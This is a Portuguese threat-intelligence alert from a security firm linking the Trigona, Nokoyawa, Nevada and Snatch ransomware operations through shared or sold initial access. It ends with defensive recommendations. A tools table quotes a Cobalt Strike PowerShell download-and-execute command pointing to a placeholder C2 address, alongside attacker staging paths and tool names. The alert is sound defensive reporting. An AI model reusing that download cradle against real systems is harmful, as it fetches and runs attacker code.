Quanto custa o acesso à sua empresa? Identificamos operação em conjunto de 4 grupos de Ransomware

Por Caique Barqueta: Os custos de recuperação após um vazamento de dados pode ser mais caro do que o investimento em proteção e cibersegurança. Uma pesquisa mostra que o valor médio de um incidente é de R$ 23 milhões e, com o crescimento do número de ataques cibernéticos e avanços na tecnologia, a tendência é que esse valor só aumente. 

Durante a atuação de incidentes de seguranças relacionados a casos de ransomware, a equipe de Inteligência da ISH, o Heimdall, identificou que operadores e grupos de ransomware estariam se comunicando para realizar ataques de Acesso Iniciais milionários a organizações.

Foi verificada a correlação dos ransomwares Trigona, Nokoyawa, Nevada e Snatch em incidentes de segurança, comprovando que existem “parcerias” e “vendas” de acessos de empresas que já foram vítimas por qualquer um dos ransomwares mencionados.

Neste alerta, mencionamos resumidamente quem são estes grupos de ransomwares e os vínculos observados nos incidentes de segurança.

Ransomware Trigona

Uma vez realizada a busca do histórico dos operadores do Ransomware Trigona, foi observado que estes passaram a atuar em meados de novembro de 2022, sendo identificados por meio do perfil de pesquisadores MalwareHunterTeam.

Figura 1. Publicação MalwareHunterTeam sobre o Ransomware Trigona.

Em relatórios públicos sobre o Ransomware Trigona, foi verificado que o vetor inicial de infecção do ransomware seria por meio de e-mails (phishing), conexões RDP e exploração de vulnerabilidades existentes.

Na ocasião, foi observado que, após a criptografia, o Ransomware Trigona altera as extensões para “.locked”, apresentando uma mensagem de resgate em .hta no host infectado com o nome “how_to_decrypt.hta”.

Figura 2. Nota de resgate do Ransomware Trigona.

Ainda, após a nota de resgate ser apresentada à vítima, a organização é encaminhada ao navegador na rede Tor. É necessário usar a chave deixada na nota de resgate para ter acesso ao bate-papo.

Figura 3. Login de acesso ao portal Trigona com o ID da nota.
Figura 4. Continuação da página de inscrição do Ransomware Trigona.

Em outro relatório sobre a análise do grupo e operações do Trigona, foi mencionada a anatomia do ataque do ransomwareapresentada abaixo.

Figura 5. Cadeia de ataque do Ransomware Trigona segundo Arete Fusion.

Para o acesso inicial, foi verificada a exploração da vulnerabilidade CVE-2021-40539 na solução de segurança de identidade da ManageEngine, conhecida como “desvio de autenticação Zoho ManageEngine ADSelfServices build 6113 e anteriores”.

Essa vulnerabilidade permite que o invasor execute remotamente um código malicioso e obtenha controle total de um sistema comprometido sem a intervenção do usuário.

Foi observada ainda a utilização do exploit ADSSP para dar “bypass” na autenticação e utilização do PowerShell para baixar e instalar o ScreenConnect no host infectado, provocando uma conexão remota para movimentação lateralmente, exfiltração de dados e implantação da carga útil.

Além disso, pôde-se concluir que uma das builds identificadas do Ransomware Trigona foi a compilação na linguagem Rust.

Figura 6. Compilação detectada do Ransomware Trigona.

Agora que abordamos as operações do Ransomware Trigona, vamos descrever brevemente as operações do Ransomware Nokoyawa.

Ransomware Nokoyawa

Com relação ao Ransomware Nokoyawa, foi observada a publicação realizada pela TrendMicro sobre possíveis relações com o Ransomware Hive.

As operações do Ransomware Nokoyawa foram identificadas em sua primeira variante em fevereiro de 2022, havendo ainda 4 tipos de variantes identificadas ao longo das operações, conforme a imagem abaixo apresentada pela Zscaler.

Figura 7. Tabela de comparação das variantes identificadas do Ransomware Nokoyawa.

Um dos principais pontos observados é que o ransomware foi escrito em duas linguagens, C/C++ e Rust, com a 2.1 sendo considerada uma variante do Nokoyawa, mesmo estando identificada nas operações do Ransomware Nevada.

Alguns dos pontos observados foram que o ataque do Ransomware Nokoyawa inclui a utilização do Cobalt Strike como parte da fase inicial do ataque, bem como a utilização das ferramentas legítimas:

Abaixo, foram reunidas todas as possíveis ferramentas utilizadas pelo Ransomware Nokoyawa –também utilizadas pelo Ransomware Hive.

FerramentaComando ou LocalizaçãoDetalhes
Nekto/PriviCMD%public%\Music\svhost.exeUtilizado para fins de escalonamento de privilégios.
Cobalt Strike download-nop -w hidden -c “IEX ((new-objetnet.webclient).downloadstring(‘_<IP do C2’))”Utilização do Cobalt Strike para drop da carga.
Coroxy/SystemBC%userprofile\Pictures\socks.exe %systemroot%\System32\sok.exeUtilizado para implantação de comandos e scripts do PowerShell e acesso Remoto.
Local do Payload dorRansomware e nome utilizadoC:\PerLogs\xxx.exe %mytemp%\xxx.exeUtiliza o nome do arquivo “xxx.exe” como payload.
Utilização do GMERUtilizado para evasão de defesa.N/A
PC Hunter  e Scripts do PowerShellUtilização para a coleta de informações e evasão de defesa.N/A
PsExecImplantação e execução de ransomware em outros ativos.N/A
AdFindUtilização para fins de coleta e descoberta.Utilizado o adfind para descobertas de ativos e informações relevantes do AD.
Tabela 1 – Lista de ferramentas utilizadas pelo Ransomware Nokoyawa.

Em resumo, as operações do Ransomware Nokoyawa foram iniciadas em janeiro de 2022 e estão em ativa até o presente momento, com a identificação das variantes de 2023 e da associação ao Ransomware Nevada.

Após essa breve explanação sobre o Ransomware Nokoyawa, abordaremos alguns pontos sobre o Ransomware Nevada.

Ransomware Nevada

O Ransomware Nevada surgiu em um anúncio no fórum RAMP, tendo iniciado suas operações em meados de dezembro de 2022 ao publicar junto ao fórum o anúncio da abertura de programas de afiliados.

Figura 8. Postagem no fórum RAMP referente a atração de novos afiliados para o Nevada.

Este ransomware possui uma plataforma muito interativa referente às operações para os afiliados, na qual poderão criar e projetar o tipo de carga a ser utilizada em um determinado ataque.

Sua carga é compilada na linguagem de programação Rust, semelhante ao Nokoyawa e Hive, que utilizam esta mesma linguagem de para criar seu arquivo.

Um dos principais pontos a ser ressaltado é que o Ransomware Nevada possui um grande apelo para contratação de Corretores de Acessos Iniciais, os quais realizam a compra de acessos iniciais das empresas vítimas para prosseguir com os ataques de ransomwares.

Também foram identificadas similaridades entre o comportamento de criptografia do Ransomware Nokoyawa e Nevada, como exemplificado na imagem já apresentada do Ransomware Nokoyawa, levando a crer que possivelmente sejam os mesmos operadores de ransomware, ainda que com variantes distintas.

Ransomware Snatch

O Ransomware Snatch é uma variante que surgiu no final de 2018 e, desde março de 2019, possui como foco de seus ataques diversas empresas.

Em resumo, o Ransomware Snatch realiza a criptografia devido à reinicialização das máquinas em modo de segurança após a sua configuração completa, definindo a operação de criptografia do ransomware como um serviço. Uma vez reinicializada em modo de segurança, o processo de criptografia é iniciado.

Este grupo de ransomware também realiza a exfiltração dos dados das máquinas infectadas, havendo ainda um site de data leak para publicação dos dados e método de extorsão para recebimento de resgates dos ataques.

Figura 9. Página de Resgate do Ransomware Snatch.

Como o enfoque deste alerta não é realizar a análise completa da cadeia de ataque do Ransomware Snatch, apresentaremos a seguir as conclusões relacionadas aos vínculos dos grupos supracitados.

Timeline e conclusão

Apresentamos, abaixo, uma timeline de eventos de resposta a incidentes de segurança vinculados aos grupos dos ransomwares mencionados neste alerta, havendo um possível envolvimento entre seus operadores.

Figura 10. Linha do Tempo de ataque dos Ransomwares.

Como é passível de observação, existe uma possível conexão relacionada a venda ou compartilhamento de informações do Ransomware Trigona com os operadores do Ransomware Nokoyawa, principalmente para acessos iniciais à organização.

Outro fato relevante é que, há aproximadamente 3 semanas, foi realizada a compilação de um Ransomware Nokoyawa em Linguagem C/C++. Este ataque levou dias para ser identificado.

Além disso, quanto à publicação e extorsão realizada pelo Nokoyawa, foram identificados indícios de envolvimento dos operadores do Ransomware Snatch, havendo vínculo exclusivo com seus sites de vazamento de dados.

Em uma breve comparação dos sites de data leak dos operadores do Nokoyawa e Snatch, é possível observar muitas semelhanças entre suas operações, podendo-se acreditar que há uma parceria entre eles.

Figura 11. Site de data leak Nokoyawa.
Figura 12. Site de data leak Snatch.

Como observado, fica evidente a relação dos operadores Nokoyawa e Snatch, havendo similaridades no desenvolvimento e layout do site de vazamento.

A equipe de inteligência apresenta abaixo outro fato: há o incentivo de venda ou disponibilização de acessos após o primeiro ataque de ransomware, confirmando-se ainda mais o famoso dito “se já foi vítima de ransomware, espere que será novamente”, justamente pela possibilidade de vendas ou compartilhamento de acessos e dicas.

Figura 13. Vínculos de operadores de Ransomware Nokoyawa, Hive, Snatch e Nevada.

Portanto, podemos concluir que os operadores de ransomware, desde seus primeiros programas de afiliados, realizavam o compartilhamento de informações e/ou venda de acessos para as organizações que já foram vítimas, ficando evidente a existência do vínculo das operações do Ransomware Nokoyawa, Nevada, Hive e Snatch.

Recomendações contra ransomwares

Além dos indicadores de comprometimento elencados abaixo pela ISH, poderão ser adotadas medidas visando a mitigação da infecção do referido malware, como por exemplo:

  • Realização de backups regulares: armazene cópias de segurança de todos os dados importantes em um local seguro e desconectado;
  • Realização de atualizações de softwares: mantenha todos os softwares de ativos atualizados, incluindo sistemas operacionais e aplicativos.
  • Utilização de proteção de rede, como firewalls, antivírus e outras medidas de segurança para proteger sua rede.
  • Realização do trabalho de conscientização com os colaboradores, ensinando aos mesmos a reconhecer e evitar ameaças, como phishing e/ou clicar em links maliciosos.
  • Monitoração regular da sua rede e sistemas para identificar e responder rapidamente a qualquer atividade suspeita.
  • Criação e aplicação de um plano de resposta de incidentes, sendo que em caso de ataques de ransomware poderão ser utilizados e conterão informações como questões relacionadas a backups e recuperação de sistema.

Referências

  • Heimdall by ISH Tecnologia
  • Identificação do Ransomware Trigona via Bleeping Computer
  • Análise realizada do Ransomware Trigona – Fortinet
  • Relatório do Ransomware Trigona – Arete
  • Publicação Zscaler ThreatLabz
  • Play Ransomware e Nokoyawa com mesmo tipo de método de ataques – TrendMicro
  • TrendMicro Ransomware Nokoyawa